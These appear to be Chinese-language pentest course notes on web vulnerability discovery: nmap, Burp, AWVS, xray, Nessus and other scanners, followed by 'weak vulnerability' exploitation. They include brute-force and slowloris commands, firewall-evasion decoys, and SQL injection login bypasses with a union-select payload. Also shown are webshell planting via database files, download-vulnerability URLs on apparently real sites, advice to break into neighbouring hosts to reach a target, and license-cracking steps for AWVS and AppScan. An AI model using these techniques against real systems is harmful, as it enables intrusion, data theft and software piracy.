07.漏洞分析

1.web漏洞恩熙
2.漏洞分析工具
3.kali漏洞分析工具
4.弱漏洞利用
5.漏洞批量探測

1.web漏洞分析
咱們要挖掘什麼漏洞？
應該從哪裏挖掘？
網站源碼分析
已知源碼
咱們能夠下載其源碼本地分析
百度該源碼漏洞
未知源碼
黑盒測試該網站漏洞（手工、工具自動掃描）

咱們要挖掘什麼漏洞？
答：能夠按照owasp top 10挖掘重點漏洞

應該從哪裏挖掘？
答：sql url 不管怎麼挖都和用戶數據交互離不開
www.fanghan.com/news.asp?id=12&sid=123 //和數據有交互
www.fanghan.com/index.html //靜態頁面無交互，不易產生漏洞

有經驗的工程師通常會
www.fanghan.com
1.經過信息收集
2.測試注入漏洞 / -0 and 1=1 1=2
3.識別cms //查看對應cms漏洞
fanghan.com/html/12?html //這是特有的僞靜態
①分析出是aspcms 能夠經過百度搜索對應的cms漏洞進行 探測
②下載該cms去分析源碼（找到後臺笛子，數據庫路徑，編輯器，上傳，數據庫備份路徑等等）
data/#data.asp // 前臺留言，直接寫入一句話，菜刀連接
data/data.mdb //直接下載就行
③各種cms的exp
若是不能識別cms類型，經過信息收集，挖掘web應用程序漏洞（sql 上傳，xss ,csrf,SSRF,邏輯，代碼執行，文件包含等等）

2.漏洞分析工具使用
漏洞掃描工具：
namp awvs appscan burp xray w3af skipfish nikto nessus

NMAP---端口掃描之王 //信息收集會用到他
主機探測
端口掃描
服務版本掃描
主機系統指紋識別
密碼破解
漏洞探測
建立掃描腳本

主機探測（一） //掃描你主機中哪些正常通訊的，並非關機的。
掃描單個主機 nmap 192.168.1.2
掃描整個子網,命令以下: //測這個網段有哪些主機存活，探測同時也會掃描100個常常開放的相關端口
nmap 192.168.1.1/24
掃描多個目標,命令以下：
nmap 192.168.1.2 192.168.1.5
掃描一個範圍內的目標,以下： nmap 192.168.1.1-100 (掃描IP地址爲192.168.1.1-192.168.1.100內的全部主機) 若是你有一個ip地址列表，將這個保存爲一個txt文件，和namp在同一目錄下,掃描這個txt內的全部主機，命令以下： nmap -iL target.txt

①nmap 192.168.1.1/24 100個最有可能開放的端口 //粗略的去看一下有哪些主機存活
②nmap -sT -p1-65535 192.168.8.128 //詳細的去掃描單個目標全部端口
③nmap iL target.txt -exclude-file exc.txt // 掃描文件比較多就能夠放到txt裏面，放到nmap目錄下去掃描 掃描target.txt 並排除掉exc.txt裏的主機

若是你想看到你掃描的全部主機的列表，用如下命令:
nmap -sL 192.168.1.1/24
掃描除過某一個ip外的全部子網主機,命令：
nmap 192.168.1.1/24 -exclude 192.168.1.1
掃描除過某一個文件中的ip外的子網主機命令
nmap 192.168.1.1/24 -excludefile xxx.txt(xxx.txt中的文件將會從掃描的主機中排除)

端口掃描：

經常使用命令：
nmap -F -sT -v nmap.org
-F：掃描100個最有可能開放的端口
-v 獲取掃描的信息
-sT：採用的是TCP掃描 不寫也是能夠的，默認採用的就是TCP掃描 -p 指定要掃描的端口
-p 80,90,3306,10-100

掃描端口狀態：
Open 端口開啓，數據有達到主機，有程序在端口上監控
closed 端口關閉， 數據有達到主機，沒有程序在端口上監控
Filtered 數據沒有到達主機，返回的結果爲空，數據被防火牆或者是IDS過濾
UnFiltered 數據沒有到達主機，可是不能識別端口的當前狀態
Open | Filtered 端口沒有返回值，主要發生在UDP、ip, FIN,NULL和Xmas掃描中
Closed | filtered 只發生在ip ID idle掃描

TCP掃描（-sT）
這是一種最爲普通的掃描方法，這種掃描方法的特色是：
掃描的速度快，準確性高，對操做者沒有權限上的要求，
可是容易被防火牆和IDS(防入侵系統)發現
運行的原理：經過創建TCP的三次握手鍊接來進行信息的傳遞
① Client端發送SYN；
② Server端返回SYN/ACK，代表端口開放；
③ Client端返回ACK，代表鏈接已創建；
④ Client端主動斷開鏈接。

SYN掃描（-sS）
這是一種祕密的掃描方式之一，由於在SYN掃描中Client端和Server端沒有造成3次握手，因此沒有創建一個正常的TCP鏈接，所以不被防火牆和日誌所記錄，通常不會再目標主機上留下任何的痕跡，可是這種掃描是須要root權限（對於windows用戶來講，是沒有root權限這個概念的，root權限是linux的最高權限，對應windows的管理員權限）

 

UDP端口掃描
使用UDP ping探測主機：
nmap -PU 192.168.1.0/24
服務版本探測
nmap -sV 192.168.1.1
精準地確認端口上運行的服務
nmap -sV --script unusual-port 192.168.1.1

掃描出來不知道的端口服務怎麼辦？
1.百度
2.能夠經過http訪問 //fanghan.com:8811
3.nc telnet nmap 對端口進行指紋識別

nmap -sV -p8120-8130 192.168.1.1 //服務指紋識別
namp -sV -p8120-8130 --script unusual-port 192.168.1.1 //服務指紋識別不行就用這個

探測目標主機的操做系統

nmap -O 192.168.1.19
nmap -A 192.168.1.19
-oN 導出掃描結果 //txt格式方便報告
-oX 導出掃描結果xml格式

nmap信息收集腳本 國外的接口
腳本 解釋
hostmap-ip2hosts IP反查
dns-bruts DNS信息收集
membase-http-info 檢索系統信息
smb-security-mode.nse 後臺打印機服務漏洞
smb-check-vulns.nse 系統漏洞掃描
http-stored-xss.nse 掃描 web漏洞
snmp-win32-servlces 經過snmp列舉windows服務/帳戶
dns-brute 枚舉DNS服務器的主機名
http-headers/http-sitemap-generator HTTP信息收集
SSL-enum-ciphers 枚舉SSL祕鑰
ssh-hostey SSH服務祕鑰 信息探測

使用方法：
nmap -sn --script hostmap-ip2hosts www.fanghan.com //對目標進行IP反查
nmap --script dns-brute www.fanghan.com
nmap --script dns-brute dns-brute.threads=10 www.fanghan.com //對目標DNS信息的收集
nmao -p445 192.168.23.1 --script membase-http-info //瞭解目標系統的詳細信息

密碼破解
暴力破解VNC
nmap --script vnc-brute --script-args brute.guesses=6,brute.emptypass=true,userdb=/root/dictionary/user.txt,brute.useraspass=true,passdb=/root/dictionary/pass.txt,brute.retries=3,brute.threads=2,brute.delay=3 42.96.170.128
破解telnet
nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst --script-args telnet-brute.timeout=8s 192.168.1.1
ftp弱口令暴力破解
nmap --script ftp-brute --script-args brute.emptypass=true,ftp-brute.timeout=30,userdb=/root/dirtionary/usernames.txt,brute.useraspass=true,passdb=/root/dirtionary/passwords.txt,brute.threads=3,brute.delay=6 192.168.1.1

漏洞探測
掃描系統漏洞
namp --script vuln 192.168.1.1 // 其實就是掃描cve的漏洞
//掃描下有沒有漏洞，有的話直接使用msf對系統進行漏洞利用
HTTP.sys 遠程代碼執行
nmap -sV --script http-vuln-cve2015-1635 192.168.1.1
IIS 短文件泄露
nmap -p 8080 --script http-iis-short-name-brute 192.168.1.1
拒絕服務
nmap --max-parallelism 800--script http-slowloris www.cracer.com
驗證http 中開啓了put 方法 //若是開啓能夠直接寫入一句話進去。
nmap --script http-put --script-args http-put.url=/uploads/testput.txt,http-put.file=/root/put.txt 218.19.141.16
驗證MySQL 匿名訪問 //能不能用空密碼進行訪問mysql
nmap --script mysql-empty-password 203.195.139.153

防火牆躲避
-f 分片繞過
-D使用誘餌隱蔽掃描
NMAP -D 1.1.1.1,222.222.222.222 www.cracer.com --source-port 源端口欺騙
//防火牆識別你是經過原地址和原端口，這個是指定地址進行欺騙

技術文章：
https://blog.csdn.net/ZiXuanFY/article/details/52513512

AWVS
安裝完後也只能谷歌使用

安裝重點：
1.能夠在內網直接訪問3443端口
2.安裝證書
3.破解
複製wvsc.exe到C:\Program Files (x86)\Acunetix\13.0.200205121 替換掉
複製license_info.json到C:\ProgramData\Acunetix\shared\license 替換掉

//AWVS配合xray能夠批量掃描

網站爬行
漏洞掃描
目標發現
子域名掃描
http 編輯
http嗅探
http模糊測試
認證測試
網絡服務掃描器

Dashboard：
Dashboard是一個儀表盤，裏面包含全部網站高危中危普通漏洞總和。
Most Vulnerable Tarfets 這些是掃的ip以及端口
TOP Vulnerabilities 漏洞的分類

菜單類的介紹：
Targets（目標）：
Add Target(添加目標)
Add Targers(一羣目標)
Target Groips（分組）//天天掃20個就能夠建個文件夾方便管理
實例：
①建立一個組名稱爲2020-7-14 添加目標http://192.168.194.138:8001 分配到2020-7-14 保存
②保存之後 Buslness Crlikaliyt是不是做用爲商業用途。//默認就能夠
③ Crawling爬蟲信息 User Agent 是否使用默認，使用谷歌或者火狐 // 不要使用默認，會被安全狗攔截
④路徑默認就行
⑤import Files 導入文件結構 //也能夠不導入
⑥HTTP:Authentication 開啓後這個認真是爬取到用戶名密碼自動認真 //不填也能夠
⑦Client Certificata 開啓後，填入相關證書 //不填也能夠
⑧Proxy Server 開啓代理選擇 HTTP 127.0.0.1 1080 //掃描後會先把請求交給ss代理，在由ss代理出去，這樣更加隱蔽。若是屏蔽代理就掃不到
⑨Scan 掃描yes 會有選擇
Scan Type(掃描類型）：
Full Scan//完整的掃描
High Risk vulnerabilities//高風險的漏洞掃描
Cross-site Scriping Vulnerabilities//跨站漏洞掃描
SQL lnjection Vulnerabilities //sql注入掃描
Weak passwords //只掃描弱口令
趕時間就掃注入，由於掃注入牛逼
Report(模板)
//模板默承認以不用生成，掃描完後再去生成

掃描後：
Scan lnformation,掃描信息 漏洞級別
Target lnformation 會列出類型
掃描信息，服務器版本，系統，腳本
Discovered Hosts 網站的外鏈
Latest Alerts 紅:高危 黃：中危 藍：低危 綠：信息泄露
Vulnerabilities 漏洞的詳情
Site Structure 蜘蛛爬行的站點信息
Events 事件信息

Reports 報告生成
New Report建立報告
Scan Report目標報告
Target Report 掃描報告
All Vulneraxxxx 漏洞報告 標準： ISO2701 OWASP Top10 2017 企業較多用

Email Settings 掃描發送給郵箱
Excluded Hours 定義客戶掃描事件

系統裏面自動切換ip
kali有一個--auto-ip-changer 每5秒切換一次ip
主要是對抗阿里雲封Ip

APPSan
1.安裝appscan9.0軟件：運行「APPS_STD_EDI_9.0_WIN_ML_EVA.exe」。
2.安裝appscan9.0臨時補丁：運行「9.0.0.0iFix001-AppScan.msp」。
3.安裝appscan9.0.0.1補丁包，運行「9.0.0.1-AppScan_Setup.msp」。
4.破解，將「LicenseProvider.dll」替換到「\AppScan Standard」目錄下。

複製APPSan文件包---按照readme.txt的順序---
安裝dotNet461_WithFix_CHS_2016.06.08.exe 程序
默認安裝就能夠了
在安裝2
在安裝3
操做4


//不知道如何給客戶講的話能夠參考APPSan裏的修復方案

進入頁面後
建立新的模板 // 能夠試試其餘模板
常規掃描---
web應用程序掃描---
起始url：目標ip
添加其餘域名 // 也能夠添加子域名
配置代理 //也能夠不配置
不記錄---
缺省值---
完成---yes---
保存掃描結果

開始後自動先爬去目錄和連接
左上角手動點擊開始掃描

 

Burp2020

Dashboard儀表盤:
Tasks任務模塊
1.Add links Add item itself ,same爬蟲
2.Audit checks - passive 掃描漏洞的
Event log事件模塊
lssue activity漏洞模塊
New sacn 主動掃描//審計目標，並給目標發送漏洞驗證
details 邊爬邊掃
只爬行不掃描漏洞
填寫掃描地址
con figuration 掃描配置---Clawling：
爬蟲線程
爬行時間
登陸信息
掃描配合---Auditing:
掃漏配置，默認就行
Application login 爬蟲帳號密碼
Resource pool 線程時間，提交間隔時間//默認便可

New live task 被動掃描//單純審計流量查看能夠目錄

被動掃描沒法添加目標
Proxy Repeater intruder 發送到這幾個裏面他會本身進行探測
爬取到的目錄在Target裏面

Proxy代理抓包
右鍵Do intercept response tothisxxxx//返回當前響應包
放包
響應包能夠把fels 改爲true
//通常會在驗證的地方改true例如登陸界面修改
HTTPhistory //代理歷史記錄

Options代理設置小知識
All interfaces//若是設置這裏全部的網卡訪問8080都會被抓包

抓HTTPS小技巧
火狐掛載代理輸入127.0.0.1
搜索burp
CA Certificate 點擊下載
工具---選項---高級---加密---查看證書--
服務器---導入---下載的der後綴
找到 PortswiaaerCA點擊編輯信任---信任此證書---編輯信任都勾選---肯定
導出PortswiaaerCA----當前環境下後綴是CRT ----
導出以後---證書機構---把導出的CAT導入進入肯定---肯定

測試https://baidu.com。 就能抓到443https的接口了

谷歌抓https
如今代理裏面把https 127.0.0.1 8080添加上、
設置---高級---更多---管理證書---
受信任的根證書頒發機構---下一步---瀏覽選擇剛剛的crt證書---完成

手機抓取HTTPS
找到百度手機型號，把crt證書導入到裏面去就行

Options代理設置
代理掛載點/導入證書/導出證書
截取客戶端請求//默認
響應包請求//默認
Mtch and replace替換頭部信息cookie

Intruder
Positions
爆破用的多
Sniper //就加載一個字典
Battering ram // 兩個多個變量使用一個字典。適合爆破帳號和密碼一致的狀況，例如企業員工登陸接口
Pitchfork// 每一個標量使用單獨一個字典，變量1字典1，變量2字典2. 順序從上到下，從左到右位置來肯定。
Cluster bomb//交叉爆破，取用戶名1跑100密碼，用戶名2跑100密碼，用戶名3跑100密碼

實例：
爆破企業員工登陸的後臺能夠，指定密碼，採用Sniper調用字典pas(中國姓名前500)來爆破。

ip池跑方法，用Battering ram client-ip來更換IP變量。

Payloads
payload type字典類型較多使用的有
Simple list單一文本
character substitution// 字符變化數字
Numbers //跑數字。 格式：1 1000 1 跑1到1000的數字，每次遞增1
1 4 最小的整數位 最大的整數位。 最小的小數位 最大的小數位
Brute forcer//暴力破解驗證碼，4位大概10分鐘自動生成字典拍
Extension-generated//根據擴展插件隨機生成，例如隨機ip插件

Payload Processing裏面Add添加：
Add prefix //在頭部添加信息
Add suffix //在尾部添加信息
Match/replace//匹配替換 //匹配到admin替換爲fanghan
Hash和Encode//轉編碼，大多頁面都會把密碼轉爲編碼提交到服務器。這時候用到這個就行
Intruder文章
http://bubuko.com/infodetail-3506522.html

Payload Encoding URL編碼
通常都去掉，好比跑目錄的時候會不正確

Options
Upedate control//默認更新頭請求信息，Waf會檢測

Request Engine線程類
Nemberxxx:5 //5個線程通常給15就行，多了小站會跑死
3 //出現錯誤重連次數 3次
2000//每次重連間隔時間2000毫秒
Attack Results //掃描保存的信息
Grep-Match // 匹配規則

Grep-Rxtract//正則匹配規則
從結果裏去匹配相應的信息

Repeater 重放器

Sequencer taoke識別功能

Decoder 編碼解碼功能

Comparer 請求對比 // 在proxy右鍵發送

擴展重點
除了商店自帶的擴展之外，本身添加擴展方法 例如:fake ip 幫助生成Ip
1.Options
2.Python xxxx安裝jython.jar環境
3.Extensions選項Add--Extension type 選擇python
4.Extension type（最好不是中文路徑） fake ip
5.找到repealer 選擇框右鍵fakeip
6.fakeip:指定ip 127.0.0.1 隨機生成ip
7.client-ip 1.1.1.1 //攔截位置添加變量
8.Payloads裏面使用擴展類型
9.跑

還有有個掃phpStudy-Backdoor-passive.py 後門的插件須要自動添加
burp設置代理服務器
User options
Upstream Proxy Serers
Add
*
127.0.0.1
1080
這就是由burp把代理給ssr

切換代理ip文章
https://www.uedbox.com/post/59218/
//得註冊一個亞馬遜的key

插件能夠查看工具裏帶的文章

Kali 漏洞分析工具使用
skipfish
shipfish是一款web應用安全偵查工具。skipfish會利用遞歸怕重和基於字典的探針生成一副交互式網站地圖。最終生成的地圖繪製經過安全檢查後輸出。
使用：
skipfish -o (輸出位置) -W/-S （字典文件位置） （目標網站）
掃描結束後查看輸出文件便可。。

1. ls /usr/share/skipfish/dictionaries/complete.wl //複製下來字典路徑，先查看字典位置
2. skipfish -o 123 -S 路徑 回車//在root 123目錄下
3.skipfish -o 123 -S 路徑 http://192.168.194.138 掃描
4.任意鍵繼續
5.Database statistics：Issues found: 23 info （信息泄露）， 0 warn （警告），0low （低危）， 0 medium（中危）， 2high(高危 impact

7.掃描完成後去123裏找index 查看結果，而且打開錯誤頁面用手注入驗證
8.用sqlmap -u "注入地址" 進行驗證

w3af

w3af是web application attack and audit framework（web應用攻擊和安全審計框架）的縮寫。
它是一個開源的web應用安全掃描器和漏洞利用工具。
兩種使用方式：
一種圖形界面
二種是命令行

圖形界面進入方法
cd w3af/ 進入w3af目錄
ls // 查看執行程序
./w3af_gui //執行圖形程序
至關於awvs 和APPscan主要掃web漏洞
功能：web掃漏，Manual Request(手動修改請求頭）， Fuzzy request(壓力測試)，Encode/decode（編碼），導出請求，對比，設置代理。
咱們使用主要功能掃漏洞便可
empty_profile空模板自定義
audit //掃描漏洞，裏面能夠自行選擇須要掃哪些漏洞
//盲注，溢出，跨站，CSRF，代碼執行，文件上傳，文件泄露，本地文件包含，遠程包含等等。
auth //認證插件，指定用戶名密碼
bruleforce// 爆破的
crawl //爬蟲

若是不知道選擇哪一個就選擇自帶的模板好比
OWASP_TOP10
XXX
XXX
XXX

每次掃描他會指定操做系統和腳本類型，保存關閉掃描
log裏查看結果
Results
exp查看漏洞狀況

這個掃描器是重量級掃描器，特別針對代碼執行漏洞

命令行使用方法
cd w3af/
./w3af_console
1.help //查看須要設置的東西
2.進入plugins//進入插件目錄
3.help //查看9個插件分類

漏洞插件
4.audit//查看漏洞插件
若是隻想調用sqli和xss怎麼辦
5.audit sqli xss // audit all 是啓用全部插件
6.audit//查看調用狀況 Enabled證實調用成功

爬蟲插件
help
7.crawl//查看爬蟲插件
8.crawl web_spider phpinfo//調用這兩個插件

輸出結果插件
9.help
10.output //默認是在console 控制檯輸出的也能夠保存自定義文件
11.back

設置目標
12.target//進入設置目標
13.help //查看設置
14.view //查看設置的目標
15.set target http://192.168.194.138:80 //設置目標爲192.168.197.138:80
16.set target_os windows //設置目標操做系統爲windows系統
17.set target_framework php
18.back
19.help

設置訪問出發點
20.http-settings
21.help
22.view //查看設置目標 默認的user_agent 是w3af.org若是有WAF會攔截
23.set user_agent 替換掉百度爬蟲的鏈接
24.save//退出
25.back//返回菜單根目錄

最後總結s
26.help
基本設置的是plugins插件，target目標，http-settings躲避參數
27.start//開始

ninkto
Nikto 是一款開放源代碼的、功能強大的WEB掃描評估軟件，能對web服務器多種安全項目進行測試的掃描軟件，去尋找已知有名的漏洞，能在230多種服務器上掃描出 2600多種有潛在危險的文件、CGI及其餘問題，它能夠掃描指定主機的WEB類型、主機名、特定目錄、COOKIE、特定CGI漏洞、返回主機容許的 http模式等等。它也使用LibWhiske庫，但一般比Whisker更新的更爲頻繁。Nikto是網管安全人員必備的WEB審計工具之一。
-h 指定掃描的目標 –p 端口
nikto -h www.xiaojin.org -p 80,8080,8081
-C 指定CGI目錄 –all表示猜解CGI目錄
nikto -h www.xiaojin.org -C all
-T選項包含不少小選項 –T 9表示掃描SQL注入漏洞
nikto -h www.xiaojin.org -T 9
-o 指定輸入結果
nikto -h www.xiaojin.org -o result.txt

nikto -H //查看詳細幫助

WFUZZ

是一款用來進行web應用暴力猜解的工具，支持對網站目錄、登陸信息、應用資源文件等暴力猜解，還能夠進行get及post參數的猜解，sql注入、xss漏洞的測試等，該工具全部功能都依賴於字典文件。
用法： 猜解www.cracer.com/目錄下有哪些頁面和目錄，經過加載字典文件進行猜解，而且排除404頁面，將結果以整齊的格式存放到0k.html
wfuzz -c -z file,字典文件(pass) --hc 404 -o html www.cracer.com/FUZZ 2>0k.html 猜解登陸表單的密碼
wfuzz -c -z file,字典 -d "login=admin&pwd=FUZZ" --hc 404 http://www.cracer.com/admin/index.php
猜解id號
wfuzz -c -z range,1-1000 --hc 404 -o html http://www.cracer.com/?post=FUZZ 2>ok.html

wfuzz字典位置：
ls /usr/share/wfuzz/worflist/general/medium.txt //複製路徑

wfu -c -z file,字典位置 --hc 404 http://192.168.194.138/FUZZ

Wpsan

Wpscan在kaliLinux2.0 中默認已經安裝，WPScan是一款針對wwordpress的安全掃描軟件；WPScan能夠掃描出wordpress的版本，主題，插件，後臺用戶以及爆破後臺用戶密碼等。

wpscan --url 地址 -e u
-e 爆破的意思
-e u //爆破用戶名
-e p //爆破插件
-e t// 爆破主題

p分類：
ap 全部插件
vp 漏洞插件
t分類：
at 全部主題
vt 漏洞主題

-U admin -P /root/pass.txt //指定用戶名admin 爆破密碼路徑

 

XRAY
使用方法參照文本：https://www.anquanke.com/post/id/184204
https://docs.xray.cool/#/tutorial/introduce

啓用XRAY
./xray_linux_amd64

1.使用基礎爬蟲爬取並對爬蟲爬取的連接進行漏洞掃描 //自帶的爬蟲工具
xray webscan --basic-crawler http://example.com --html-output vuln.html

websan --basic-crawler http://192.168.194.138:80 --html-output 123.html

2.使用 HTTP 代理進行被動掃描//相似於burp偵聽端口
xray webscan --listen 127.0.0.1:7777 --html-output proxy.html
設置瀏覽器 http 代理爲 http://127.0.0.1:7777，就能夠自動分析代理流量並掃描。

3.只掃描單個 url，不使用爬蟲
xray webscan --url http://example.com/?a=b --html-output single-url.html

4.手動指定本次運行的插件
默認狀況下，將會啓用全部內置插件，可使用下列命令指定本次掃描啓用的插件。

 

xray webscan --plugins cmd_injection,sqldet --url http://example.com
xray webscan --plugins cmd_injection,sqldet --listen 127.0.0.1:7777

5.指定插件輸出
能夠指定將本次掃描的漏洞信息輸出到某個文件中: //不指定插件會默認使用全部插件去掃描
xray webscan --url http://example.com/?a=b \
--text-output result.txt --json-output result.json --html-output report.html

用的比較多的不是單純的調用，而是批量去掃描。

調用360的天相爬蟲，爬到的保存起來交給xray，再去抓取掃描
調用原理：
先在xary偵聽到目標站7777端口，在寫一個python腳本去啓動360天相的爬蟲爬去指定的連接而且生成txt，
在把txt裏的連接交給偵聽的7777去掃描。

首先：須要在kali裏面安裝谷歌瀏覽器，而後還須要一個python寫的腳本工具裏叫launcher.py
在須要360天相爬蟲。

webscan --listen 127.0.0.1:7777 --html-output p.html //先偵聽端口
vi targets.txt //把須要爬的地址放到targets.txt裏，能夠寫多個，例如測試c段或者目標比較多。
http://192.168.1.1:8080
python launcher.py //啓用後就會給craw發送指令去抓取targets.txt裏的網址，而且保存到sub_domains.txt裏面，而且在把sub_domains.txt交給xray去掃描

Nessus

//我記得得須要企業郵箱
// Kali 下載就下載Debian 64的下載
下載nessus軟件包
官方地址： http://www.tenable.com/products/nessus/select-your-operating-system
安裝
dpkg -i Nessus-6.5.4-debian.deb
默認安裝目錄爲/tmp/nussus
啓動nessus
/etc/init.d/nessusd start //中止是stop

經過註冊獲取激活碼 註冊地址：
http://www.tenable.com/products/nessus/nessus-plugins/obtain-an-activation-code

1.netstat -tnlp //啓動後查看偵聽的端口 偵聽的端口爲8834

2.打開瀏覽器https://127.0.0.1:8834

3.第一次登陸須要把激活碼填寫進去

4.第一次會更新內容須要一個半小時，若是奔潰了，就使用離線更新，工具包裏有帖子

//all-2.0.tar.gz Nessus-8.10.0-dede //離線更新的包
5.admin admin

使用方法：
New Scan 主頁能夠建立新的掃描
lmport //導入掃描結果
Now Fdder //建立新的文件夾
//新建掃描模板以下：
Host Discovery //發現網絡當中存活的主機
Basic Network Scan // 掃描網絡信息
Advanced San //高級掃描 //自定義插件
Mobile Devxxx //發現網絡中移動設備掃描
web APPloxxx //基於web應用程序的掃描
Credentinaxxx //認證的繞過等
Bash Shellshock //shell的執行等

例如掃描web //實際上就是他勾選了幾個web漏洞插件
例如自定義掃描就是用高級掃描

進入高級掃描後進入配置界面

Name （建立掃描的名稱）
Description(描述隨便寫)
Folder (文件夾選擇默認便可)
Targets 目標
這個目標能夠是域名，能夠是ip，也能夠是一個ip段 ,C類網址也能夠//
//192.168.8.1-192.168.8.100 或者192.168.8.0/24

Add File //能夠添加一個掃描文件，把地址域名放進文件加載掃描

Credentials 這個認證能夠執行帳號密碼進行更深層次去掃描

Plugins //插件 右上角Enable All 啓用 Dissble All

例如插件勾選：
Backdoors //檢查是否有後面
Brude force attacks //暴力破解帳號
CGl xxx //能夠勾選下
Databass //數據庫
Denial fo Service //拒絕服務
DNS
F5 //網絡負載均衡
Firewalls //防火牆
FTP
Gen loo Local Secuity //基本信息
Servive doxxx //服務指定
settings //
SMTP problems //有沒有郵件
SNMP //網絡協議
下面幾個Windows插件
設置完之後點擊Save保存
返回出去點擊開始標緻

信息放大

當咱們測試目標無法漏洞時，咱們會將目標放大，發現更多與目標相關聯的信息。
例如：
旁站-->C段?子域名
旁站： C段：獲取到收集方向：ip、端口、域名、目錄。
同網段其餘服務器後要記得驗證是否在同一機房內。
子域名：柿子挑軟的捏（找低版本的更容易下手）
工具：Layer子域名挖掘 site:cracer.com

搞不了主站就去搞旁站，先了解旁站用幾種方式搭建的
ip,端口，域名，目錄，這4種搭建
ip很差發現
端口：nmap -sV 1.1.1.1掃描這個目標 識別高危端口//學校教育政府OA喜歡端口建站
域名：愛站，工具站點
目錄：御劍掃描目錄，bbs old shop upload m //掃出來後都得去訪問下是否是另外一個站點。
獲取旁站的權限，再去提權，迂迴拿到主站權限。

相關弱漏洞利用

暴庫利用
下載漏洞
後臺爆破
Exp使用
批量漏洞檢測

暴庫利用：
爆出了網站數據庫文件位置
to parent directory
last modified Description
轉到父目錄
inurl:/.asp<id=<% <%< %
繞過防下載
#sdsf.mdb
下載時改爲 %23sdsf.mdb
若是數據庫文件自己就是asp、asa、cer文件，也能夠直接寫shell。
Aspcms

碰見這種：！@#￥fafsdafasfsaf.mdb如何下載
答：把她轉換成url編碼再去下載 在HackBar ENCODING轉換

碰見：123123.asp //數據庫文件變成asp怎麼辦
答：使用迅雷下載，下載後改爲123213.mdb就行

asp2.0通常會有data目錄
特定的cms 會有data目錄/data.asp
data/db.asp
在前臺留言插入一句話，使用菜刀鏈接，由於數據庫是asp就直接鏈接了

下載漏洞 ///asp很少了，php比較多

phpcmsv9,meiunfo 6.0
大概位置：admin/234sdfsafs/php?fileconfig=../../congig.php//數據庫路徑和帳號密碼會泄露
若是根目錄下有phpmyadmin就直接用密碼等，若是沒有，找旁站100個裏總有一個有

下載文件名稱爲參數傳遞而且可控可操做。 http://ipo.snnu.edu.cn/shida/UploadFiles/indentAttFile/2012061222041778.doc http://ipo.snnu.edu.cn/down.asp?fileup=shida/UploadFiles/indentAttFile/2012061222041778.doc http://www.sxzzy.cn/ggjs/news/down.asp?FileName=doc/2012-5/2012053010329973.doc
下載漏洞利用

經過蜘蛛爬行
找到該url
下載 conn.asp config.php config.
asp db.mdb

後臺密碼爆破
網站常見的cms管理系統有：
織夢、discuz、帝國、phpweb、WordPress、aspcms、科訊、南方、良精、ecshop等
常見初始密碼弱口令：
Admin、admin88八、admin12三、12345六、111/123/1111十一、等等。
邏輯萬能密鑰：
‘or’=’or’
Admin’ or 1=1--
常見破解工具
Burpsuite
Discuz破解qi 
一些python密碼破解腳本
httpfuzzer
針對性破解工具。。

當碰見：fanghan.com/897898/login.php //頗有可能897898就是密碼
fanghanadmin
fanghan.com
fanghan123
admin_fanghan

萬能祕鑰
asp 'or'='or'
php admin'or 1=1

後臺爆破這一塊：
無驗證碼，用burp
有也能夠用burp

關鍵字 : Powered by AspCms2.0 admin_shopxp/upLoad_bm.asp inurl:news/html/?411.html 注入地址： down/class/index.php?myord=1 news/class/index.php?showtag= 萬能密碼 admin 'or '1'='1 織夢批量 搜索關鍵字： Powered by DedeCMS_V57_UTF8_SP1 2004-2011 DesDev Inc inurl:shopxp_news.asp TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin